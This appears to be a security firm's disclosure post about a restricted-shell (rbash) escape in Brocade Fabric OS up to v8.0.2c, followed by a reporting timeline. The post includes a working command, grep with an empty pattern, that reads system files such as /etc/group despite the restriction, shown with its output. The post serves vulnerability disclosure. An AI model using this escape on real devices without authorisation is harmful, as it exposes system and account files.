Brocade Fabric OS ≤ v8.0.2c rbash escape to read system files
Broadcom offers a number of products and networking solutions such as switches, extensions etc. These products come with their own operating system, i.e. the Fabric OS. It is a lightweight OS that upon logging in through ssh
or telnet
one is found within the restricted environment of rbash
. The user is not able to execute any of the known system commands, such as ls
, echo
, cd
, cat
, etc but only some available custom commands the developers have made themselves e.g.
...
iflshow Display edge switch FCR connection information
interfaceshow Display the FSPF (TM) interface information
iodset Manage the in-order delivery (IOD) option
iodshow Display the state of the in-order delivery option
ipaddrset Set ethernet and FC IP addresses
ipaddrshow Print ethernet and FC IP addresses
islshow Display the current connections and status
...
One of the available commands is the classic system command grep
. The system also allows pipelines |
, which explains the reason for them to allow the use of grep
HOSTNAME:user> ipaddrshow
SWITCH
Ethernet IP Address: 10.115.76.184
Ethernet Subnetmask: 255.255.254.0
Gateway IP Address: 10.115.76.251
DHCP: Off
HOSTNAME:user> ipaddrshow |grep Gateway
Gateway IP Address: 10.115.76.251
HOSTNAME:user>
By leaving grep
available one can read underlying system files by searching for the empty pattern ''
. The files one has access to depend on the authenticated user's privileges.
HOSTNAME:user> cat /etc/group
rbash: cat: command not found
HOSTNAME:user> ls /etc/group
rbash: ls: command not found
HOSTNAME:user> grep '' /etc/group
root::0:root
sys::3:root,bin
smmsp::25:smmsp
nobody::99:
users::100:
utmp:x:102:
admin::600:admin,root
user::602:user,admin,root
switchadmin::604:
operator::605:
zoneadmin::606:
fabricadmin::607:
basicswitchadmin::608:
securityadmin::609:
udrole::550:
HOSTNAME:user>
The issue was discovered by Bitcrack during a penetration test for a client and reported it to Broadcom's PSIRT. Broadcom's internal security audit discovered it earlier this year and had scheduled a fix before Bitcrack notified them.
Timeline:
Reported to Broadcom's PSIRT: 26/9/2022
First response and redirecting us to Brocade SIRT: 26/9/2022
Second response letting us know of the found issue: 5/10/2022
Clarifications and ask for permission to post on our blog: 10/10/2022
No response from Broadcom, release of the article: 29/11/2022